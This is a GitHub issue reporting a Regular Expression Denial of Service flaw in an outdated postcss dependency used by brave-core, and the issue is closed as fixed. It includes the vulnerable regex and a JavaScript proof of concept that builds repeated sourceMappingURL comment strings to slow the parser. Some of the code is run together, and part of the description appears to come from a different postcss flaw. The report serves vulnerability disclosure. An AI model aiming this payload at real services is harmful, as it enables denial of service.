Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Regular Expression Denial of Service via postcss #38413

Closed
2 of 6 tasks
imhunterand opened this issue May 19, 2024 · 0 comments · Fixed by brave/brave-core#23748
Closed
2 of 6 tasks

Regular Expression Denial of Service via postcss #38413

imhunterand opened this issue May 19, 2024 · 0 comments · Fixed by brave/brave-core#23748
Labels
dev-concern OS/Desktop QA/No release-notes/exclude
Milestone
1.68.x - Beta

Comments

@imhunterand
Copy link

Description

The project brave/brave-core was used postcss before 7.0.36 or between 8.0.0 and 8.2.13 are vulnerable to Regular Expression Denial of Service (ReDoS) via getAnnotationURL() and loadAnnotation() in lib/previous-map.js. The vulnerable regexes are caused mainly by the sub-pattern. An attacker can prepare CSS in such a way that it will contains parts parsed by PostCSS as a CSS comment. After processing by PostCSS, it will be included in the PostCSS output in CSS nodes (rules, properties) despite being originally included in a comment.

Steps to reproduce

\/\*\s* sourceMappingURL=(.*)

PoC

var postcss = require("postcss")
function build_attack(n) {
    var ret = "a{}"
    for (var i = 0; i < n; i++) {
        ret += "/*# sourceMappingURL="
    }
    return ret + "!";
}
postcss.parse('a{}/*# sourceMappingURL=a.css.map */') for (var i = 1; i <= 500000; i++) {
    if (i % 1000 == 0) {
        var time = Date.now();
        var attack_str = build_attack(i) try {
            postcss.parse(attack_str) var time_cost = Date.now() - time;
            console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
        } catch (e) {
            var time_cost = Date.now() - time;
            console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
        }
    }
}

CWE-400

Actual result

NA

Expected result

NA

Reproduces how often

Easily reproduced

Brave version (brave://version info)

v1.68.28

Channel information

  • release (stable)
  • beta
  • nightly

Reproducibility

  • with Brave Shields disabled
  • with Brave Rewards disabled
  • in the latest version of Chrome

Miscellaneous information

Requested fix #23744
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
dev-concern OS/Desktop QA/No release-notes/exclude
Projects
None yet
Milestone
1.68.x - Beta
Development

Successfully merging a pull request may close this issue.

Update typescript-plugin-css-modules to latest brave/brave-core
3 participants
@diracdeltas @brave-builds @imhunterand